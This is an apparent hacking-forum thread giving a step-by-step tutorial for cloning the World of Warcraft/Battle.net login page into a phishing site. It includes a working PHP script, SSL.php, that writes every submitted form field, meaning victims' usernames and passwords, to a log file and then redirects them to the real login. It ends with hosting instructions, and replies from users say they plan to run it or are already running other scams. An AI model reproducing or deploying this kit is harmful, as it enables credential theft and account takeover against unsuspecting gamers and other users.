Phisher Maker [TuT]

[Sub-Zero5]

Whats up?

OK, So today im gonna show you how to make a phisher page of any site, [eBay paypal or world of warcraft] althought dont come running to me if you get caught.

What's First?

OK, first we gonna use the world of warcraft login page for a tutorial [Only registered and activated users can see links. ] So go their! now once the page has loaded right click the page and select "save as".

Now on your going to have a file and a folder on your desktop, open the .html file. doesnt look like the real page does it? so before we make it logg things to files we needs to make it look like the real deal. go into the folder [login.xml_files] and open all the css files with a text editor [notepad if your on windows] Keep those windows open but minimize them for now.

Now go back to the real login page for blizzard, if your in firefox select Tools>Page info>Media. Now click on the urls below, each one is the url to a picture, find the urls to the pictures that YOUR phisher doesnt have. EG the background, the login button, and the little world of warcraft logo. Copy the url to clipboard, then go back to the .css files, search the name of the image [the name can be found at the end of the url you just copied] in the .css file.

So For instance the url at the top is Skin-wow-blank.jpg, copy the url and search that name in the css files. and yes search all of them.

When you find the strig it looks like this.

Code:

url('../_images/skin-wow-blank.jpg') #000000 no-repeat center top !important; text-align:center }

Don't bother with anything other then the skin-wow-blank.jpg, dlete everything inside of the ' ' and paste in the url we copied before. so in the end you will have.

Code:

url('https://us.battle.net/login/_themes/wow/_images/skin-wow-blank.jpg') #000000 no-repeat center top !important; text-align:center }

Now refresh your phisher tab or window, and HUH? the background is their. you need to follow the exact same steps for this page, and in that case for all sites that dont display the images.

Logging data to files

Now With the hard part over heres something nice and simple, open your phishers .html file [login.xml.xhtml] with text editor or notepad. Now search for "action=" this tells what the button is to do upon being clicked, if we leave it it logs them into blizzard, but ofc we dont what that.

if done correctly you find this

Code:

action="/login/login.xml?ref=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2F&app=wam"

Now Change everything insde the " " to SSL.php

End result

Code:

action="SSL.php">

Now We Simply need to download the SSL.php and do the final editing. download it from the bottom of the page, once done, open it up with text editor or notepad,

Code:

<?php

header ('Location: https://eu.battle.net/login/login.xml?ref=https%3A%2F%2Fwww.wow-europe.com%2Faccount%2F&app=wam ');

$handle = fopen("Logged-3332.html", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

Thats the contents of the file, see at the top, Header ('location: http:// and so on? thats the url you will be redirected to when the php file has done its job, by default it sends you to the normal login page, you can change it to wherever make sure their is a space between : and the ' otherwise it wont work.

secondly the logged-3332.html is the file that will be created with the logged details, you can change it to what ever you wont just dont change the extension [.html] if you change it to .txt it mite not work because some server dont allow .txt files on their servers anymore so just change the name if needed.

Done?

Yup, everything is ready to go, just upload the .html the SSL.php and the folder [Make sure the folder is called the EXACT same as it is on your desktop] to your online webhost.

[Only registered and activated users can see links. ]

[Aseleon]

Thanks for this, I am going to try this. Not the real computer expert here :P, I hope I can manage, lol. for the add

[Sub-Zero5]

Quote:

Originally Posted by zomgwtfbbqyayz

Thanks for this, I am going to try this. Not the real computer expert here :P, I hope I can manage, lol. for the add

You will, just go slowly and you should manage.

[Slim Shady]

Quote:

Originally Posted by Sub-Zero5

You will, just go slowly and you should manage.

You can't garantee that a scam will "work". He might setup up the phisher, but it's no clear if he's going to get any accounts. Anyway , nice thread, I'm also going to try it.

[zaphry]

Little less *Bling* blue would be better ;# (hurts eyes when reading)

[Mathmech]

Quote:

Originally Posted by zaphry

Little less *Bling* blue would be better ;# (hurts eyes when reading)

qft.
But really, It's pretty easy to setup your own instead of ripping pics from blizzards official site.
Just dl the files from here
upload the files to a ftp
???
profit

[comos]

Hey thx i will try it when i finish the fbm scam

[Sub-Zero5]

OK i changed the text to deep sky blue [grey test looks so boring]